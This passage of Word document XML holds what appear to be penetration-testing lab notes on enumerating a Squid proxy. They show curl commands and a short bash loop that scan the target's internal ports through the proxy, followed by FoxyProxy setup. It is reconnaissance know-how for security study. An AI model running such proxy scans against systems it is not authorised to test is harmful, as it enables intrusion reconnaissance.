    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId1050">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">HackTricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives us some tools to work with.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="521" name="image504.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image504.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1051"/>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2FD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDA">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, we may be able to use Squid to scan itself. We want to use the -i argument in curl to show the response code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#To scan itself on port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i --proxy http://$IP:3128 http://$IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#To scan itself on port 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FDF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i --proxy http://$IP:3128 http://$IP:443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#To scan itself on port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -i --proxy http://$IP:3128 http://$IP:8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3433763" cy="1425232"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67" name="image82.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image82.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1052"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3433763" cy="1425232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get a hit on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Doing them one at a time is a bit tedious. My notes contain a bash script that someone gave me. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This Bash script automates testing whether certain ports on a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are reachable through a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — and specifically whether they return an HTTP status code </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OK) when accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Proxy details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy_address="192.168.x.x"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxy_port="3128"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FEF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Target IP and ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">target_ip="192.168.x.x"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ports=("80" "443" "8000" "8080") #Feel free to add additional ports in the same format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Loop over ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for port in "${ports[@]}"; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Make a request using curl with the proxy, and save the response and status code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    response=$(curl -s -o /dev/null -w "%{http_code}" --proxy $proxy_address:$proxy_port $target_ip:$port)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FF9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Check if the status code is 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    if [ "$response" -eq 200 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        echo "Response from $target_ip:$port with status code $response"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    fi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running it we get the same result, but I ran it against the same ports so that's not a surprise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003000">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003001">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="762000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="384" name="image383.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image383.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1053"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="762000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003002">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003003">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Okay great! From here we can use our own beloved</w:t>
      </w:r>
      <w:hyperlink r:id="rId1054">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1055">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">FoxyPoxy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reach the desired web offering </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">through</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Squid Proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003004">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To add it to FoxyProxy, select Options.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003005">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2337242" cy="3005026"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="126" name="image129.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image129.png"/>
